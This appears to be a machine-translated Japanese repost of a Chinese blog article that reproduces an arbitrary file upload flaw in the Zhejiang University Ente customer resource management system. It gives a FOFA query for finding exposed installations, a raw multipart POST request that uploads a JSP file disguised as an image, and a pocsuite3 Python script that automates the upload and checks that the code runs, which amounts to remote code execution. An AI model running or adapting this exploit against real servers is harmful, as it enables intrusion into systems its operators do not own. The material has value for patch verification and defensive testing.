脆弱性再発 - 浙江大学Ent顧客リソース管理システムCustomerAction.entphone; .jsインターフェース任意ファイルアップロード脆弱性(脆弱性検出スクリプトあり)

免責事項

記事に含まれる脆弱性は修正されており、機密情報は暗号化されています。記事は経験の共有のみを目的としています。真剣に受け止めないでください。不正な攻撃は違法です。記事内の機密情報は複数のレベルで処理されています。本記事に掲載されている情報の流布・利用により生じた直接的・間接的な結果・損失については、利用者が責任を負うものとし、著者は一切の責任を負わないものとします。

脆弱性の説明

浙江大学エンテ顧客リソース管理システムは、企業の顧客リソース管理を目的としたソフトウェア製品です。このシステムは、企業が顧客リソースを効率的に管理および活用し、販売およびマーケティングの成果を向上できるように設計されています。システムの CustomerAction.entphone;.js インターフェイスを使用すると、攻撃者は任意の悪意のある JSP ファイルをシステムにアップロードでき、リモート コード実行攻撃につながる可能性があります。この脆弱性は、システムの完全性とセキュリティに重大な影響を与える可能性があります。

フォファ声明

title="欢迎使用浙大恩特客户资源管理系统"

POCプラス検出

POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A

------WebKitFormBoundarye8FPHsIAq9JN8j2A
Content-Disposition: form-data; name="file";filename="test.jsp"
Content-Type: image/jpeg

<%out.print("test");%>
------WebKitFormBoundarye8FPHsIAq9JN8j2A--

実行が成功すると、ファイルパスが返され、結合されたパスがファイルへのアクセスに使用されます。

pocスクリプト

スクリプト用の pocsuite フレームワーク

# _*_ coding:utf-8 _*_
# @Time : 2023/12/15
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class zhedaente_upload(POCBase):
    pocDesc = '''浙大恩特客户资源管理系统CustomerAction.entphone;.js文件上传漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-15'
    name = '浙大恩特客户资源管理系统CustomerAction.entphone;.js文件上传漏洞'



    def _verify(self):

        result = {}
        url = self.url+ '/entsoft/CustomerAction.entphone;.js?method=loadFile'

        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Connection': 'close',
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A"
        }
        path = "/entsoft/CustomerAction.entphone;.js?method=loadFile"
        try:
            data = '------WebKitFormBoundarye8FPHsIAq9JN8j2A\r\nContent-Disposition: form-data; name="file";filename="test.jsp"\r\nContent-Type: image/jpeg\r\n\r\n<%out.print("test");%>\r\n------WebKitFormBoundarye8FPHsIAq9JN8j2A--'

            response = requests.post(url, headers=headers, data=data)
            if response.status_code == 200:
                response_json = response.json()
                filepath = response_json.get('filepath')
                if filepath:
                    check_path = self.url + filepath
                    check_response = requests.get(check_path, headers=headers, verify=False)
                    if check_response.status_code == 200 and 'test' in check_response.text:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['path'] = path

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(zhedaente_upload)

スクリプトエクスプロイト

おすすめ

転載: blog.csdn.net/jjjj1029056414/article/details/135015136
おすすめ